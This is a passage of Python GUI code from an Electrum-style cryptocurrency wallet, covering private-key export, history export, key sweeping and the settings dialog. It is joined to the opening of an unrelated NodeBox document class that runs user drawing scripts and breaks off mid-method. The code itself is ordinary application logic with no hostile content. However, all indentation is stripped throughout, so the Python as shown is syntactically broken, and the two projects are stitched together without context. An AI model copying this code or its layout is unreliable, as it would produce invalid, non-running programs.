tx = self.read_tx_from_file()
if tx:
self.show_transaction(tx)
def do_process_from_txid(self):
from electrum import transaction
txid, ok = QInputDialog.getText(self, _('Lookup transaction'), _('Transaction ID') + ':')
if ok and txid:
txid = str(txid).strip()
try:
r = self.network.synchronous_get(('blockchain.transaction.get',[txid]))
except BaseException as e:
self.show_message(str(e))
return
tx = transaction.Transaction(r)
self.show_transaction(tx)
@protected
def export_privkeys_dialog(self, password):
if self.wallet.is_watching_only():
self.show_message(_("This is a watching-only wallet"))
return
d = WindowModalDialog(self, _('Private keys'))
d.setMinimumSize(850, 300)
vbox = QVBoxLayout(d)
msg = "%s\n%s\n%s" % (_("WARNING: ALL your private keys are secret."),
_("Exposing a single private key can compromise your entire wallet!"),
_("In particular, DO NOT use 'redeem private key' services proposed by third parties."))
vbox.addWidget(QLabel(msg))
e = QTextEdit()
e.setReadOnly(True)
vbox.addWidget(e)
defaultname = 'electrum-private-keys.csv'
select_msg = _('Select file to export your private keys to')
hbox, filename_e, csv_button = filename_field(self, self.config, defaultname, select_msg)
vbox.addLayout(hbox)
b = OkButton(d, _('Export'))
b.setEnabled(False)
vbox.addLayout(Buttons(CancelButton(d), b))
private_keys = {}
addresses = self.wallet.get_addresses()
done = False
def privkeys_thread():
for addr in addresses:
time.sleep(0.1)
if done:
break
private_keys[addr] = "\n".join(self.wallet.get_private_key(addr, password))
d.emit(SIGNAL('computing_privkeys'))
d.emit(SIGNAL('show_privkeys'))
def show_privkeys():
s = "\n".join( map( lambda x: x[0] + "\t"+ x[1], private_keys.items()))
e.setText(s)
b.setEnabled(True)
d.connect(d, QtCore.SIGNAL('computing_privkeys'), lambda: e.setText("Please wait... %d/%d"%(len(private_keys),len(addresses))))
d.connect(d, QtCore.SIGNAL('show_privkeys'), show_privkeys)
threading.Thread(target=privkeys_thread).start()
if not d.exec_():
done = True
return
filename = filename_e.text()
if not filename:
return
try:
self.do_export_privkeys(filename, private_keys, csv_button.isChecked())
except (IOError, os.error) as reason:
txt = "\n".join([
_("Electrum was unable to produce a private key-export."),
str(reason)
])
self.show_critical(txt, title=_("Unable to create csv"))
except Exception as e:
self.show_message(str(e))
return
self.show_message(_("Private keys exported."))
def do_export_privkeys(self, fileName, pklist, is_csv):
with open(fileName, "w+") as f:
if is_csv:
transaction = csv.writer(f)
transaction.writerow(["address", "private_key"])
for addr, pk in pklist.items():
transaction.writerow(["%34s"%addr,pk])
else:
import json
f.write(json.dumps(pklist, indent = 4))
def do_import_labels(self):
labelsFile = self.getOpenFileName(_("Open labels file"), "*.json")
if not labelsFile: return
try:
f = open(labelsFile, 'r')
data = f.read()
f.close()
for key, value in json.loads(data).items():
self.wallet.set_label(key, value)
self.show_message(_("Your labels were imported from") + " '%s'" % str(labelsFile))
except (IOError, os.error) as reason:
self.show_critical(_("Electrum was unable to import your labels.") + "\n" + str(reason))
def do_export_labels(self):
labels = self.wallet.labels
try:
fileName = self.getSaveFileName(_("Select file to save your labels"), 'electrum_labels.json', "*.json")
if fileName:
with open(fileName, 'w+') as f:
json.dump(labels, f, indent=4, sort_keys=True)
self.show_message(_("Your labels where exported to") + " '%s'" % str(fileName))
except (IOError, os.error), reason:
self.show_critical(_("Electrum was unable to export your labels.") + "\n" + str(reason))
def export_history_dialog(self):
d = WindowModalDialog(self, _('Export History'))
d.setMinimumSize(400, 200)
vbox = QVBoxLayout(d)
defaultname = os.path.expanduser('~/electrum-history.csv')
select_msg = _('Select file to export your wallet transactions to')
hbox, filename_e, csv_button = filename_field(self, self.config, defaultname, select_msg)
vbox.addLayout(hbox)
vbox.addStretch(1)
hbox = Buttons(CancelButton(d), OkButton(d, _('Export')))
vbox.addLayout(hbox)
run_hook('export_history_dialog', self, hbox)
self.update()
if not d.exec_():
return
filename = filename_e.text()
if not filename:
return
try:
self.do_export_history(self.wallet, filename, csv_button.isChecked())
except (IOError, os.error), reason:
export_error_label = _("Electrum was unable to produce a transaction export.")
self.show_critical(export_error_label + "\n" + str(reason), title=_("Unable to export history"))
return
self.show_message(_("Your wallet history has been successfully exported."))
def do_export_history(self, wallet, fileName, is_csv):
history = wallet.get_history()
lines = []
for item in history:
tx_hash, height, confirmations, timestamp, value, balance = item
if height>0:
if timestamp is not None:
time_string = format_time(timestamp)
else:
time_string = _("unverified")
else:
time_string = _("unconfirmed")
if value is not None:
value_string = format_satoshis(value, True)
else:
value_string = '--'
if tx_hash:
label = wallet.get_label(tx_hash)
label = label.encode('utf-8')
else:
label = ""
if is_csv:
lines.append([tx_hash, label, confirmations, value_string, time_string])
else:
lines.append({'txid':tx_hash, 'date':"%16s"%time_string, 'label':label, 'value':value_string})
with open(fileName, "w+") as f:
if is_csv:
transaction = csv.writer(f, lineterminator='\n')
transaction.writerow(["transaction_hash","label", "confirmations", "value", "timestamp"])
for line in lines:
transaction.writerow(line)
else:
import json
f.write(json.dumps(lines, indent = 4))
def sweep_key_dialog(self):
d = WindowModalDialog(self, title=_('Sweep private keys'))
d.setMinimumSize(600, 300)
vbox = QVBoxLayout(d)
vbox.addWidget(QLabel(_("Enter private keys:")))
keys_e = QTextEdit()
keys_e.setTabChangesFocus(True)
vbox.addWidget(keys_e)
addresses = self.wallet.get_unused_addresses()
h, address_e = address_field(addresses)
vbox.addLayout(h)
vbox.addStretch(1)
button = OkButton(d, _('Sweep'))
vbox.addLayout(Buttons(CancelButton(d), button))
button.setEnabled(False)
def get_address():
addr = str(address_e.text()).strip()
if bitcoin.is_address(addr):
return addr
def get_pk():
text = str(keys_e.toPlainText())
return keystore.get_private_keys(text)
f = lambda: button.setEnabled(get_address() is not None and get_pk() is not None)
on_address = lambda text: address_e.setStyleSheet(BLACK_FG if get_address() else RED_FG)
keys_e.textChanged.connect(f)
address_e.textChanged.connect(f)
address_e.textChanged.connect(on_address)
if not d.exec_():
return
tx = self.wallet.sweep(get_pk(), self.network, self.config, get_address(), None)
if not tx:
self.show_message(_('No inputs found. (Note that inputs need to be confirmed)'))
return
self.warn_if_watching_only()
self.show_transaction(tx)
def _do_import(self, title, msg, func):
text = text_dialog(self, title, msg + ' :', _('Import'))
if not text:
return
bad = []
good = []
for key in str(text).split():
try:
addr = func(key)
good.append(addr)
except BaseException as e:
bad.append(key)
continue
if good:
self.show_message(_("The following addresses were added") + ':\n' + '\n'.join(good))
if bad:
self.show_critical(_("The following inputs could not be imported") + ':\n'+ '\n'.join(bad))
self.address_list.update()
self.history_list.update()
def import_addresses(self):
if not self.wallet.can_import_address():
return
title, msg = _('Import addresses'), _("Enter addresses")
self._do_import(title, msg, self.wallet.import_address)
@protected
def do_import_privkey(self, password):
if not self.wallet.can_import_privkey():
return
title, msg = _('Import private keys'), _("Enter private keys")
self._do_import(title, msg, lambda x: self.wallet.import_key(x, password))
def settings_dialog(self):
self.need_restart = False
d = WindowModalDialog(self, _('Preferences'))
vbox = QVBoxLayout()
tabs = QTabWidget()
gui_widgets = []
fee_widgets = []
tx_widgets = []
id_widgets = []
# language
lang_help = _('Select which language is used in the GUI (after restart).')
lang_label = HelpLabel(_('Language') + ':', lang_help)
lang_combo = QComboBox()
from electrum.i18n import languages
lang_combo.addItems(languages.values())
try:
index = languages.keys().index(self.config.get("language",''))
except Exception:
index = 0
lang_combo.setCurrentIndex(index)
if not self.config.is_modifiable('language'):
for w in [lang_combo, lang_label]: w.setEnabled(False)
def on_lang(x):
lang_request = languages.keys()[lang_combo.currentIndex()]
if lang_request != self.config.get('language'):
self.config.set_key("language", lang_request, True)
self.need_restart = True
lang_combo.currentIndexChanged.connect(on_lang)
gui_widgets.append((lang_label, lang_combo))
nz_help = _('Number of zeros displayed after the decimal point. For example, if this is set to 2, "1." will be displayed as "1.00"')
nz_label = HelpLabel(_('Zeros after decimal point') + ':', nz_help)
nz = QSpinBox()
nz.setMinimum(0)
nz.setMaximum(self.decimal_point)
nz.setValue(self.num_zeros)
if not self.config.is_modifiable('num_zeros'):
for w in [nz, nz_label]: w.setEnabled(False)
def on_nz():
value = nz.value()
if self.num_zeros != value:
self.num_zeros = value
self.config.set_key('num_zeros', value, True)
self.history_list.update()
self.address_list.update()
nz.valueChanged.connect(on_nz)
gui_widgets.append((nz_label, nz))
msg = _('Fee per kilobyte of transaction.')
fee_label = HelpLabel(_('Transaction fee per kb') + ':', msg)
fee_e = BTCkBEdit(self.get_decimal_point)
def on_fee(is_done):
if self.config.get('dynamic_fees', True):
return
v = fee_e.get_amount() or 0
self.config.set_key('fee_per_kb', v, is_done)
self.update_fee()
fee_e.editingFinished.connect(lambda: on_fee(True))
fee_e.textEdited.connect(lambda: on_fee(False))
fee_widgets.append((fee_label, fee_e))
dynfee_cb = QCheckBox(_('Use dynamic fees'))
dynfee_cb.setChecked(self.config.get('dynamic_fees', True))
dynfee_cb.setToolTip(_("Use a fee per kB value recommended by the server."))
fee_widgets.append((dynfee_cb, None))
def update_feeperkb():
fee_e.setAmount(self.config.get('fee_per_kb', bitcoin.RECOMMENDED_FEE))
b = self.config.get('dynamic_fees', True)
fee_e.setEnabled(not b)
def on_dynfee(x):
self.config.set_key('dynamic_fees', x == Qt.Checked)
update_feeperkb()
self.update_fee_edit()
dynfee_cb.stateChanged.connect(on_dynfee)
update_feeperkb()
#slider_moved()
msg = _('OpenAlias record, used to receive coins and to sign payment requests.') + '\n\n'\
+ _('The following alias providers are available:') + '\n'\
+ '\n'.join(['https://cryptoname.co/', 'http://xmr.link']) + '\n\n'\
+ 'For more information, see http://openalias.org'
alias_label = HelpLabel(_('OpenAlias') + ':', msg)
alias = self.config.get('alias','')
alias_e = QLineEdit(alias)
def set_alias_color():
if not self.config.get('alias'):
alias_e.setStyleSheet("")
return
if self.alias_info:
alias_addr, alias_name, validated = self.alias_info
alias_e.setStyleSheet(GREEN_BG if validated else RED_BG)
else:
alias_e.setStyleSheet(RED_BG)
def on_alias_edit():
alias_e.setStyleSheet("")
alias = str(alias_e.text())
self.config.set_key('alias', alias, True)
if alias:
self.fetch_alias()
set_alias_color()
self.connect(self, SIGNAL('alias_received'), set_alias_color)
alias_e.editingFinished.connect(on_alias_edit)
id_widgets.append((alias_label, alias_e))
# SSL certificate
msg = ' '.join([
_('SSL certificate used to sign payment requests.'),
_('Use setconfig to set ssl_chain and ssl_privkey.'),
])
if self.config.get('ssl_privkey') or self.config.get('ssl_chain'):
try:
SSL_identity = paymentrequest.check_ssl_config(self.config)
SSL_error = None
except BaseException as e:
SSL_identity = "error"
SSL_error = str(e)
else:
SSL_identity = ""
SSL_error = None
SSL_id_label = HelpLabel(_('SSL certificate') + ':', msg)
SSL_id_e = QLineEdit(SSL_identity)
SSL_id_e.setStyleSheet(RED_BG if SSL_error else GREEN_BG if SSL_identity else '')
if SSL_error:
SSL_id_e.setToolTip(SSL_error)
SSL_id_e.setReadOnly(True)
id_widgets.append((SSL_id_label, SSL_id_e))
units = ['ZEIT', 'bits']
msg = _('Base unit of your wallet.')\
+ '\n1ZEIT=1ZEIT.\n' \
+ _(' These settings affects the fields in the Send tab')+' '
unit_label = HelpLabel(_('Base unit') + ':', msg)
unit_combo = QComboBox()
unit_combo.addItems(units)
unit_combo.setCurrentIndex(units.index(self.base_unit()))
def on_unit(x):
unit_result = units[unit_combo.currentIndex()]
if self.base_unit() == unit_result:
return
edits = self.amount_e, self.fee_e, self.receive_amount_e, fee_e
amounts = [edit.get_amount() for edit in edits]
if unit_result == 'ZEIT':
self.decimal_point = 8
elif unit_result == 'bits':
self.decimal_point = 2
else:
raise Exception('Unknown base unit')
self.config.set_key('decimal_point', self.decimal_point, True)
self.history_list.update()
self.request_list.update()
self.address_list.update()
for edit, amount in zip(edits, amounts):
edit.setAmount(amount)
self.update_status()
unit_combo.currentIndexChanged.connect(on_unit)
gui_widgets.append((unit_label, unit_combo))
block_explorers = sorted(block_explorer_info.keys())
msg = _('Choose which online block explorer to use for functions that open a web browser')
block_ex_label = HelpLabel(_('Online Block Explorer') + ':', msg)
block_ex_combo = QComboBox()
block_ex_combo.addItems(block_explorers)
block_ex_combo.setCurrentIndex(block_ex_combo.findText(block_explorer(self.config)))
def on_be(x):
be_result = block_explorers[block_ex_combo.currentIndex()]
self.config.set_key('block_explorer', be_result, True)
block_ex_combo.currentIndexChanged.connect(on_be)
gui_widgets.append((block_ex_label, block_ex_combo))
from electrum import qrscanner
system_cameras = qrscanner._find_system_cameras()
qr_combo = QComboBox()
qr_combo.addItem("Default","default")
for camera, device in system_cameras.items():
qr_combo.addItem(camera, device)
#combo.addItem("Manually specify a device", config.get("video_device"))
index = qr_combo.findData(self.config.get("video_device"))
qr_combo.setCurrentIndex(index)
msg = _("Install the zbar package to enable this.\nOn linux, type: 'apt-get install python-zbar'")
qr_label = HelpLabel(_('Video Device') + ':', msg)
qr_combo.setEnabled(qrscanner.zbar is not None)
on_video_device = lambda x: self.config.set_key("video_device", str(qr_combo.itemData(x).toString()), True)
qr_combo.currentIndexChanged.connect(on_video_device)
gui_widgets.append((qr_label, qr_combo))
use_rbf = self.config.get('use_rbf', False)
rbf_cb = QCheckBox(_('Enable Replace-By-Fee'))
rbf_cb.setChecked(use_rbf)
def on_rbf(x):
rbf_result = x == Qt.Checked
self.config.set_key('use_rbf', rbf_result)
self.rbf_checkbox.setVisible(rbf_result)
self.rbf_checkbox.setChecked(False)
rbf_cb.stateChanged.connect(on_rbf)
rbf_cb.setToolTip(_('Enable RBF'))
fee_widgets.append((rbf_cb, None))
usechange_cb = QCheckBox(_('Use change addresses'))
usechange_cb.setChecked(self.wallet.use_change)
if not self.config.is_modifiable('use_change'): usechange_cb.setEnabled(False)
def on_usechange(x):
usechange_result = x == Qt.Checked
if self.wallet.use_change != usechange_result:
self.wallet.use_change = usechange_result
self.wallet.storage.put('use_change', self.wallet.use_change)
multiple_cb.setEnabled(self.wallet.use_change)
usechange_cb.stateChanged.connect(on_usechange)
usechange_cb.setToolTip(_('Using change addresses makes it more difficult for other people to track your transactions.'))
tx_widgets.append((usechange_cb, None))
def on_multiple(x):
multiple = x == Qt.Checked
if self.wallet.multiple_change != multiple:
self.wallet.multiple_change = multiple
self.wallet.storage.put('multiple_change', multiple)
multiple_change = self.wallet.multiple_change
multiple_cb = QCheckBox(_('Use multiple change addresses'))
multiple_cb.setEnabled(self.wallet.use_change)
multiple_cb.setToolTip('\n'.join([
_('In some cases, use up to 3 change addresses in order to break '
'up large coin amounts and obfuscate the recipient address.'),
_('This may result in higher transactions fees.')
]))
multiple_cb.setChecked(multiple_change)
multiple_cb.stateChanged.connect(on_multiple)
tx_widgets.append((multiple_cb, None))
def fmt_docs(key, klass):
lines = [ln.lstrip(" ") for ln in klass.__doc__.split("\n")]
return '\n'.join([key, "", " ".join(lines)])
choosers = sorted(coinchooser.COIN_CHOOSERS.keys())
chooser_name = coinchooser.get_name(self.config)
msg = _('Choose coin (UTXO) selection method. The following are available:\n\n')
msg += '\n\n'.join(fmt_docs(*item) for item in coinchooser.COIN_CHOOSERS.items())
chooser_label = HelpLabel(_('Coin selection') + ':', msg)
chooser_combo = QComboBox()
chooser_combo.addItems(choosers)
i = choosers.index(chooser_name) if chooser_name in choosers else 0
chooser_combo.setCurrentIndex(i)
def on_chooser(x):
chooser_name = choosers[chooser_combo.currentIndex()]
self.config.set_key('coin_chooser', chooser_name)
chooser_combo.currentIndexChanged.connect(on_chooser)
tx_widgets.append((chooser_label, chooser_combo))
tabs_info = [
(fee_widgets, _('Fees')),
(tx_widgets, _('Transactions')),
(gui_widgets, _('Appearance')),
(id_widgets, _('Identity')),
]
for widgets, name in tabs_info:
tab = QWidget()
grid = QGridLayout(tab)
grid.setColumnStretch(0,1)
for a,b in widgets:
i = grid.rowCount()
if b:
if a:
grid.addWidget(a, i, 0)
grid.addWidget(b, i, 1)
else:
grid.addWidget(a, i, 0, 1, 2)
tabs.addTab(tab, name)
vbox.addWidget(tabs)
vbox.addStretch(1)
vbox.addLayout(Buttons(CloseButton(d)))
d.setLayout(vbox)
# run the dialog
d.exec_()
self.disconnect(self, SIGNAL('alias_received'), set_alias_color)
run_hook('close_settings_dialog')
if self.need_restart:
self.show_warning(_('Please restart Electrum to activate the new GUI settings'), title=_('Success'))
def run_network_dialog(self):
if not self.network:
self.show_warning(_('You are using Electrum in offline mode; restart Electrum if you want to get connected'), title=_('Offline'))
return
NetworkDialog(self.wallet.network, self.config, self).do_exec()
def closeEvent(self, event):
# It seems in some rare cases this closeEvent() is called twice
if not self.cleaned_up:
self.cleaned_up = True
self.clean_up()
event.accept()
def clean_up(self):
self.wallet.thread.stop()
if self.network:
self.network.unregister_callback(self.on_network)
self.config.set_key("is_maximized", self.isMaximized())
if not self.isMaximized():
g = self.geometry()
self.wallet.storage.put("winpos-qt", [g.left(),g.top(),
g.width(),g.height()])
self.config.set_key("console-history", self.console.history[-50:],
True)
if self.qr_window:
self.qr_window.close()
self.close_wallet()
self.gui_object.close_window(self)
def plugins_dialog(self):
self.pluginsdialog = d = WindowModalDialog(self, _('Electrum Plugins'))
plugins = self.gui_object.plugins
vbox = QVBoxLayout(d)
# plugins
scroll = QScrollArea()
scroll.setEnabled(True)
scroll.setWidgetResizable(True)
scroll.setMinimumSize(400,250)
vbox.addWidget(scroll)
w = QWidget()
scroll.setWidget(w)
w.setMinimumHeight(plugins.count() * 35)
grid = QGridLayout()
grid.setColumnStretch(0,1)
w.setLayout(grid)
settings_widgets = {}
def enable_settings_widget(p, name, i):
widget = settings_widgets.get(name)
if not widget and p and p.requires_settings():
widget = settings_widgets[name] = p.settings_widget(d)
grid.addWidget(widget, i, 1)
if widget:
widget.setEnabled(bool(p and p.is_enabled()))
def do_toggle(cb, name, i):
p = plugins.toggle(name)
cb.setChecked(bool(p))
enable_settings_widget(p, name, i)
run_hook('init_qt', self.gui_object)
for i, descr in enumerate(plugins.descriptions.values()):
name = descr['__name__']
p = plugins.get(name)
if descr.get('registers_keystore'):
continue
try:
cb = QCheckBox(descr['fullname'])
cb.setEnabled(plugins.is_available(name, self.wallet))
cb.setChecked(p is not None and p.is_enabled())
grid.addWidget(cb, i, 0)
enable_settings_widget(p, name, i)
cb.clicked.connect(partial(do_toggle, cb, name, i))
msg = descr['description']
if descr.get('requires'):
msg += '\n\n' + _('Requires') + ':\n' + '\n'.join(map(lambda x: x[1], descr.get('requires')))
grid.addWidget(HelpButton(msg), i, 2)
except Exception:
self.print_msg("error: cannot display plugin", name)
traceback.print_exc(file=sys.stdout)
grid.setRowStretch(i+1,1)
vbox.addLayout(Buttons(CloseButton(d)))
d.exec_()
def bump_fee_dialog(self, tx):
is_relevant, is_mine, v, fee = self.wallet.get_wallet_delta(tx)
d = WindowModalDialog(self, _('Bump Fee'))
vbox = QVBoxLayout(d)
vbox.addWidget(QLabel(_('Current fee') + ': %s'% self.format_amount(fee) + ' ' + self.base_unit()))
vbox.addWidget(QLabel(_('New Fee') + ': '))
e = BTCAmountEdit(self.get_decimal_point)
e.setAmount(fee *1.5)
vbox.addWidget(e)
cb = QCheckBox(_('Final'))
vbox.addWidget(cb)
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
if not d.exec_():
return
is_final = cb.isChecked()
new_fee = e.get_amount()
delta = new_fee - fee
if delta < 0:
self.show_error("fee too low")
return
try:
new_tx = self.wallet.bump_fee(tx, delta)
except BaseException as e:
self.show_error(str(e))
return
if is_final:
new_tx.set_sequence(0xffffffff)
self.show_transaction(new_tx)
|
__init__.py
|
import sys
import os
import traceback, linecache
import re
import objc
import time
import random
from Foundation import *
from AppKit import *
from threading import Thread
from nodebox.gui.mac.ValueLadder import MAGICVAR
from nodebox.gui.mac import PyDETextView
from nodebox.gui.mac.util import errorAlert
from nodebox import util
from nodebox import graphics
# AppleScript enumerator codes for PDF and Quicktime export
PDF = 0x70646678 # 'pdfx'
QUICKTIME = 0x71747878 # 'qt '
VERY_LIGHT_GRAY = NSColor.blackColor().blendedColorWithFraction_ofColor_(0.95, NSColor.whiteColor())
DARKER_GRAY = NSColor.blackColor().blendedColorWithFraction_ofColor_(0.8, NSColor.whiteColor())
from nodebox.gui.mac.dashboard import *
from nodebox.gui.mac.progressbar import ProgressBarController
class ExportCommand(NSScriptCommand):
pass
class OutputFile(object):
def __init__(self, data, isErr=False):
self.data = data
self.isErr = isErr
def write(self, data):
if isinstance(data, str):
try:
data = unicode(data, "utf_8", "replace")
except UnicodeDecodeError:
data = "XXX " + repr(data)
self.data.append((self.isErr, data))
# class defined in NodeBoxDocument.xib
class NodeBoxDocument(NSDocument):
graphicsView = objc.IBOutlet()
outputView = objc.IBOutlet()
textView = objc.IBOutlet()
window = objc.IBOutlet()
variablesController = objc.IBOutlet()
dashboardController = objc.IBOutlet()
animationSpinner = objc.IBOutlet()
# The ExportImageAccessory adds:
exportImageAccessory = objc.IBOutlet()
exportImageFormat = objc.IBOutlet()
exportImagePageCount = objc.IBOutlet()
# The ExportMovieAccessory adds:
exportMovieAccessory = objc.IBOutlet()
exportMovieFrames = objc.IBOutlet()
exportMovieFps = objc.IBOutlet()
# When the PageCount accessory is loaded, we also add:
pageCount = objc.IBOutlet()
pageCountAccessory = objc.IBOutlet()
# When the ExportSheet is loaded, we also add:
exportSheet = objc.IBOutlet()
exportSheetIndicator = objc.IBOutlet()
path = None
exportDir = None
magicvar = None # Used for value ladders.
_code = None
vars = []
movie = None
def windowNibName(self):
return "NodeBoxDocument"
def init(self):
self = super(NodeBoxDocument, self).init()
nc = NSNotificationCenter.defaultCenter()
nc.addObserver_selector_name_object_(self, "textFontChanged:", "PyDETextFontChanged", None)
self.namespace = {}
self.canvas = graphics.Canvas()
self.context = graphics.Context(self.canvas, self.namespace)
self.animationTimer = None
self.__doc__ = {}
self._pageNumber = 1
self._frame = 150
self.fullScreen = None
self._seed = time.time()
self.currentView = self.graphicsView
return self
def autosavesInPlace(self):
return True
def close(self):
self.stopScript()
super(NodeBoxDocument, self).close()
def __del__(self):
nc = NSNotificationCenter.defaultCenter()
nc.removeObserver_name_object_(self, "PyDETextFontChanged", None)
# text view has a couple of circular refs, it can let go of them now
self.textView._cleanup()
def textFontChanged_(self, notification):
font = PyDETextView.getBasicTextAttributes()[NSFontAttributeName]
self.outputView.setFont_(font)
def readFromFile_ofType_(self, path, tp):
if self.textView is None:
# we're not yet fully loaded
self.path = path
else:
# "revert"
self.readFromUTF8(path)
return True
def writeToFile_ofType_(self, path, tp):
f = file(path, "w")
text = self.textView.string()
f.write(text.encode("utf8"))
f.close()
return True
def windowControllerDidLoadNib_(self, controller):
if self.path:
self.readFromUTF8(self.path)
font = PyDETextView.getBasicTextAttributes()[NSFontAttributeName]
self.outputView.setFont_(font)
self.textView.window().makeFirstResponder_(self.textView)
self.windowControllers()[0].setWindowFrameAutosaveName_("NodeBoxDocumentWindow")
def readFromUTF8(self, path):
f = file(path)
text = unicode(f.read(), "utf_8")
f.close()
self.textView.setString_(text)
self.textView.usesTabs = "\t" in text
def cleanRun(self, fn, newSeed = True, buildInterface=True):
self.animationSpinner.startAnimation_(None)
# Prepare everything for running the script
self.prepareRun()
# Run the actual script
success = self.fastRun(fn, newSeed)
self.animationSpinner.stopAnimation_(None)
if success and buildInterface:
# Build the interface
self.vars = self.namespace["_ctx"]._vars
if len(self.vars) > 0:
self.buildInterface_(None)
return success
def prepareRun(self):
# Compile the script
success, output = self._boxedRun(self._compileScript)
self._flushOutput(output)
if not success:
return False
# Initialize the namespace
self._initNamespace()
# Reset the pagenum
self._pageNum = 1
# Reset the frame
self._frame = 1
self.speed = self.canvas.speed = None
def fastRun(self, fn, newSeed = False):
# Check if there is code to run
if self._code is None:
return False
# Clear the canvas
self.canvas.clear()
# Generate a new seed, if needed
if newSeed:
self._seed = time.time()
random.seed(self._seed)
# Set the mouse position
window = self.currentView.window()
pt = window.mouseLocationOutsideOfEventStream()
mx, my = window.contentView().convertPoint_toView_(pt, self.currentView)
# Hack: mouse coordinates are flipped vertically in FullscreenView.
# This flips them back.
if isinstance(self.currentView, FullscreenView):
my = self.currentView.bounds()[1][1] - my
if self.fullScreen is None:
mx /= self.currentView.zoom
my /= self.currentView.zoom
self.namespace["MOUSEX"], self.namespace["MOUSEY"] = mx, my
self.namespace["mousedown"] = self.currentView.mousedown
self.namespace["keydown"] = self.currentView.keydown
self.namespace["key"] = self.currentView.key
self.namespace["keycode"] = self.currentView.keycode
self.namespace["scrollwheel"] = self.currentView.scrollwheel
self.namespace["wheeldelta"] = self.currentView.wheeldelta
# Reset the context
self.context._resetContext()
# Initalize the magicvar
self.namespace[MAGICVAR] = self.magicvar
# Set the pagenum
self.namespace['PAGENUM'] = self._pageNumber
# Set the frame
self.namespace['FRAME'] = self._frame
# Run the script
success, output = self._boxedRun(fn)
self._flushOutput(output)
if not success:
return False
# Display the output of the script
self.currentView.setCanvas(self.canvas)
return True
@objc.IBAction
def runFullscreen_(self, sender):
if self.fullScreen is not None: return
self.stopScript()
self.currentView = FullscreenView.alloc().init()
self.currentView.canvas = None
fullRect = NSScreen.mainScreen().frame()
self.fullScreen = FullscreenWindow.alloc().initWithRect_(fullRect)
self.fullScreen.setContentView_(self.currentView)
self.fullScreen.makeKeyAndOrderFront_(self)
self.fullScreen.makeFirstResponder_(self.currentView)
NSMenu.setMenuBarVisible_(False)
NSCursor.hide()
self._runScript()
@objc.IBAction
def runScript_(self, sender):
self.runScript()
def runScript(self, compile=True, newSeed=True):
if self.fullScreen is not None: return
self.currentView = self.graphicsView
self._runScript(compile, newSeed)
def _runScript(self, compile=True, newSeed=True):
if not self.cleanRun(self._execScript):
pass
# Check whether we are dealing with animation
if self.canvas.speed is not None:
if not self.namespace.has_key("draw"):
errorAlert("Not a proper NodeBox animation",
"NodeBox animations should have at least a draw() method.")
return
# Check if animationTimer is already running
if self.animationTimer is not None:
self.stopScript()
self.speed = self.canvas.speed
# Run setup routine
if self.namespace.has_key("setup"):
self.fastRun(self.namespace["setup"])
window = self.currentView.window()
window.makeFirstResponder_(self.currentView)
# Start the timer
self.animationTimer = NSTimer.scheduledTimerWithTimeInterval_target_selector_userInfo_repeats_(
1.0 / self.speed, self, objc.selector(self.doFrame, signature="v@:@"), None, True)
# Start the spinner
self.animationSpinner.startAnimation_(None)
def runScriptFast(self):
if self.animationTimer is None:
self.fastRun(self._execScript)
else:
# XXX: This can be sped up. We just run _execScript to get the
# method with __MAGICVAR__ into the namespace, and execute
# that, so it should only be called once for animations.
self.fastRun(self._execScript)
self.fastRun(self.namespace["draw"])
def doFrame(self):
self.fastRun(self.namespace["draw"], newSeed=True)
self._frame += 1
def source(self):
return self.textView.string()
def setSource_(self, source):
self.textView.setString_(source)
@objc.IBAction
def stopScript_(self, sender=None):
self.stopScript()
def stopScript(self):
if self.namespace.has_key("stop"):
success, output = self._boxedRun(self.namespace["stop"])
self._flushOutput(output)
self.animationSpinner.stopAnimation_(None)
if self.animationTimer is not None:
self.animationTimer.invalidate()
self.animationTimer = None
if self.fullScreen is not None:
self.currentView = self.graphicsView
self.fullScreen = None
NSMenu.setMenuBarVisible_(True)
NSCursor.unhide()
self.textView.hideValueLadder()
window = self.textView.window()
window.makeFirstResponder_(self.textView)
def _compileScript(self, source=None):
if source is None:
source = self.textView.string()
self._code = None
self._code = compile(source + "\n\n", self.scriptName.encode('ascii', 'ignore'), "exec")
def _initNamespace(self):
self.namespace.clear()
# Add everything from the namespace
for name in graphics.__all__:
self.namespace[name] = getattr(graphics, name)
for name in util.__all__:
self.namespace[name] = getattr(util, name)
# Add everything from the context object
self.namespace["_ctx"] = self.context
for attrName in dir(self.context):
self.namespace[attrName] = getattr(self.context, attrName)
# Add the document global
self.namespace["__doc__"] = self.__doc__
# Add the page number
self.namespace["PAGENUM"] = self._pageNumber
# Add the frame number
self.namespace["FRAME"] = self._frame
# Add the magic var
self.namespace[MAGICVAR] = self.magicvar
# XXX: will be empty after reset.
#for var in self.vars:
# self.namespace[var.name] = var.value
def _execScript(self):
exec self._code in self.namespace
self.__doc__ = self.namespace.get("__doc__", self.__doc__)
def _boxedRun(self, method, args=[]):
"""
Runs the given method in a boxed environment.
Boxed environments:
- Have their current directory set to the directory of the file
- Have their argument set to the filename
- Have their outputs redirect to an output stream.
Returns:
A tuple containing:
- A boolean indicating whether the run was successful
- The OutputFile
"""
self.scriptName = self.fileName()
libDir = os.path.join(os.getenv("HOME"), "Library", "Application Support", "NodeBox")
if not self.scriptName:
curDir = os.getenv("HOME")
self.scriptName = "<untitled>"
else:
curDir = os.path.dirname(self.scriptName)
save = sys.stdout, sys.stderr
saveDir = os.getcwd()
saveArgv = sys.argv
sys.argv = [self.scriptName]
if os.path.exists(libDir):
sys.path.insert(0, libDir)
os.chdir(curDir)
sys.path.insert(0, curDir)
output = []
sys.stdout = OutputFile(output, False)
sys.stderr = OutputFile(output, True)
self._scriptDone = False
try:
if self.animationTimer is None:
pass
# Creating a thread is a heavy operation,
# don't install it when animating, where speed is crucial
#t = Thread(target=self._userCancelledMonitor, name="UserCancelledMonitor")
#t.start()
try:
method(*args)
except KeyboardInterrupt:
self.stopScript()
except:
etype, value, tb = sys.exc_info()
if tb.tb_next is not None:
tb = tb.tb_next # skip the frame doing the exec
traceback.print_exception(etype, value, tb)
etype = value = tb = None
return False, output
finally:
self._scriptDone = True
sys.stdout, sys.stderr = save
os.chdir(saveDir)
sys.path.remove(curDir)
try:
sys.path.remove(libDir)
except ValueError:
pass
sys.argv = saveArgv
#self._flushOutput()
return True, output
# from Mac/Tools/IDE/PyEdit.py
def _userCancelledMonitor(self):
import time
from signal import SIGINT
from Carbon import Evt
while not self._scriptDone:
if Evt.CheckEventQueueForUserCancel():
# Send a SIGINT signal to ourselves.
# This gets delivered to the main thread,
# cancelling the running script.
os.kill(os.getpid(), SIGINT)
break
time.sleep(0.25)
def _flushOutput(self, output):
